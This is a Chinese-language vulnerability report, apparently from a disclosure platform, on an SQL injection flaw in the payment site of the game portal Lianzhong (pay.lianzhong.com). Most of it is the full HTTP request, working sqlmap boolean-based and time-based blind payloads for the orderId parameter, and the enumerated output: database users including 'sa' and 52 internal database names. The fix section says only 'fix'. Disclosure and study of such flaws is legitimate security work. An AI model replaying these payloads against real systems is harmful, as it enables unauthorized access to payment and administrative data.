首页 » 漏洞 » 联众世界某处存在高危SQL注射

联众世界某处存在高危SQL注射

 
code 区域
http://pay.lianzhong.com



这个站有waf,不知道是不是坏了。



本来测试看有没支付漏洞呢,可能习惯SQL了吧,直接搞起。涉及的库有支付信息&ADMIN&BBS等。



POST /charge-center/ddzquery.do HTTP/1.1

Host: pay.lianzhong.com

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3

Accept-Encoding: gzip, deflate

DNT: 1

Referer: http://pay.lianzhong.com/charge-center/ddzquery.do

Cookie:

Connection: keep-alive

Content-Type: application/x-www-form-urlencoded

Content-Length: 128



projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=

漏洞证明:

code 区域
---

Parameter: orderId (POST)

Type: boolean-based blind

Title: OR boolean-based blind - WHERE or HAVING clause

Payload: projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=-5065' OR 2044=2044 AND 'vCvm' LIKE 'vCvm&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=



Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)

Payload: projectName=ddz&page=1&orderById=&orderByType=&channel=&orderId=' OR 2907=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'WHFl' LIKE 'WHFl&startDate=2015-06-27&endDate=2015-07-27&startAmount=&endAmount=

---

web application technology: JSP

back-end DBMS: Microsoft SQL Server 2008

database management system users [2]:

[*] sa

[*] webcharge





available databases [52]:

[*] B2CPayment

[*] DBA

[*] DBADMIN

[*] DCacheConfigDB

[*] GL_DB

[*] GL_DB1

[*] GLAdmin

[*] GLB2B

[*] GLB2C

[*] GLBill

[*] GLBuy

[*] GLCOMM_Subject

[*] GLHomeApp

[*] GLImage

[*] GLJHBBS

[*] GLJHInnerBBS

[*] GLJHWEB

[*] GLLUCK

[*] GLLuckPlayer

[*] GLLuckValue

[*] GLNews

[*] GLOGWebCommon

[*] GLOGWEBSERVICE

[*] GLPowerCoin

[*] GLSubject

[*] GLTXBBS

[*] GLWOGBBS

[*] GLZuobi

[*] LZMain

[*] LZSubject

[*] LZWebapp

[*] lzwpt

[*] master

[*] MatchDB

[*] MatchDB1

[*] MatchDB2

[*] MatchDB3

[*] MatchDB_YDLY5

[*] MHBBS

[*] model

[*] msdb

[*] newjunqi

[*] OGMain

[*] OGManage

[*] OGSubject

[*] QLGBBS

[*] tempdb

[*] test_jhbbs

[*] TWLZMain

[*] TWLZMall

[*] WebChargeCenter

修复方案:

fix

原文链接:联众世界某处存在高危SQL注射,转载请注明来源!

0